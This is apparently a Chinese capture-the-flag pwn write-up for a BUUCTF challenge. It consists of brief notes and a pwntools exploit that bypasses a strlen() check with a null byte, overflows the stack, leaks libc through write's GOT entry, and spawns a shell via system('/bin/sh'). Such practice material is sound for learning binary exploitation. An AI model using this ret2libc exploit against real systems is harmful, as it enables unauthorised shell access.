保护
ida
s是随机值,不可能让输入的buf和s相等,所以使用字符串截断绕过strlen()
注意buf[v5-1]=0对buf的修改
让buf[7]很大,最大\xff,即255,即可满足栈溢出。
准备 无
exp
from pwn import*
from LibcSearcher3 import*
context.log_level="debug"
elf=ELF("/home/error/桌面/pwn")
#i=process("/home/error/桌面/pwn")
i=remote("node4.buuoj.cn",29715)
p1=b"\x00"+b"a"*6+b"\xff"#这里的构造是重点
i.sendline(p1)
i.recvline()
write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=0x08048825
p2=cyclic(0xE7+4)+flat([write_plt,main,1,write_got,4])
i.sendline(p2)
write_addr=u32(i.recv(4))
print(hex(write_addr))
libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
sys_addr=libc_base+libc.dump("system")
she_addr=libc_base+libc.dump("str_bin_sh")
p2=cyclic(0xe7+4)+flat([sys_addr,0,she_addr])
i.sendline(p1)
i.sendline(p2)
i.interactive()
结果